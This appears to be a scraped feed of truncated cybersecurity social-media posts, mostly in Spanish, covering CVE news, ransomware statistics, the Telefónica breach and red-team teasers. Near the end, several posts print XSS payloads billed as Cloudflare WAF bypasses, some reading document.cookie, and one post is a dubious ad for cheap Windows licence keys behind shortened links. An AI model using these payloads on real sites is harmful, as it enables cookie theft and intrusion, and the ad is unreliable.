Investigadores han revelado una vulnerabilidad crítica en el decodificador de Monkey's Audio (APE) presente en smartphones Samsung, que podría permitir la ejecución remota de código malicioso. Identificada como CVE-2024-49415 y con una puntuación CVSS de…

Investigadores de ESET analizan backdoors para Linux relacionados con un conocido malware para Windows utilizado por el grupo APT Gelsemium y al Project Wood.

🔴 El año pasado las bandas de ransomware atacaron exitosamente a 1.200 empresas.

Los piratas informáticos responsables se adjudicaron 4.257 ataques, con…

🦈 Wireshark for Red Teamers: Decode, Analyze, Dominate

Wireshark is the ultimate network protocol analyzer, and for the red team, it’s a must-have for… | 13 comments on LinkedIn

🔵 Así hackearon a Telefónica: un infostealer e ingeniería social.

Telefónica, una importante empresa de telecomunicaciones, confirmó recientemente una brecha…

Active Directory is packed with powerful features, but some features like the LLMNR protocol can be a prime target for attackers. LLMNR is often exploited or “poisoned” by attackers to gain access to sensitive systems. Understanding this and knowing how to…

La plataforma líder en entrenamiento de ciberseguridad, soluciones empresariales y desafíos prácticos de hacking diseñados por expertos de la industria. ¡Ponte a prueba, aprende y compite con la comunidad hacker!

Caos en la consola: una campaña dirigida a las interfaces de gestión expuestas públicamente en los firewalls FortiGate de Fortinet:

PUNTOS CLAVE:

Arctic Wolf…

Los homógrafos engañan visualmente, ¡pero son armas de hackers! Aprende cómo se usan en phishing y descubre estrategias de protección.

Moxa, empresa con sede en Taiwán, ha advertido sobre dos vulnerabilidades de seguridad que afectan a sus routers móviles, routers seguros y dispositivos de seguridad de red. Estas vulnerabilidades podrían permitir la escalada de privilegios y la ejecución…

WEB APPLICATION PENTESTING CHECKLIST






#bugbountytips #bugbounty #infosec #cybersecurity #pentesting #ethicalhacking #Cybersecurity #InformationSecurity #EthicalHacking #CyberDefense #CyberThreats #BugHunting #PenetrationTesting #NetworkSecurity #Ap…

Recientemente se ha descubierto una vulnerabilidad crítica en Aviatrix Controller, una plataforma de red en la nube ampliamente utilizada. Esta falla, identificada como CVE-2024-50603, con una puntuación de severidad CVSS de 10.0, ha sido explotada activamente…

Cuando lanzo un #nmap …

GVGMALL.COM Venta 25% De Descuento: TU25
Win 11 Pro original de por vida ($24): https://biitt.ly/tpTe6
Win 11 Home original de por vida ($22): https://biitt.ly/ndoKW
Win 10 Pro original de por vida ($16): https://biitt.ly/Imnv6
Win 10 Home original de por…

Hola a todos.

Hoy veremos y entenderemos como hacer una correcta configuración para realizar Pivoting

En las últimas semanas, el mundo de la ciberseguridad ha vuelto a ser noticia tras el incidente que afectó a Telefónica, uno de los gigantes de las telecomunicaciones en España y a nivel global. Aunque los detalles exactos del ataque aún se están investigando…

XSS Bypass WAF Cloudflare
credit: Satrya Wira Yudha
onxss=><svg/ONLoad​=alert(cookie)+x
ONxss=><details open ontoggle​=prompt(document.domain)+x

XSS Bypass filter using polyglot
--><h2></div></div><​script>alert(1)<​/script>

XSS Bypass filter using Character…

🌊 DDoS Attacks: The Red Team’s Weapon of Mass Disruption 🌊

DDoS (Distributed Denial-of-Service) attacks are a staple in the red team arsenal, capable of overwhelming networks, crippling services, and testing the limits of incident response. This DDoS Guide…

Bypassed Cloudflare WAF with simple XSS Payload.

Payload: <svg onx=() onload​=(confirm) (document.cookie)>

#bugbountytips #bughunting #bugbounty #ethicalhacker #cybersecurity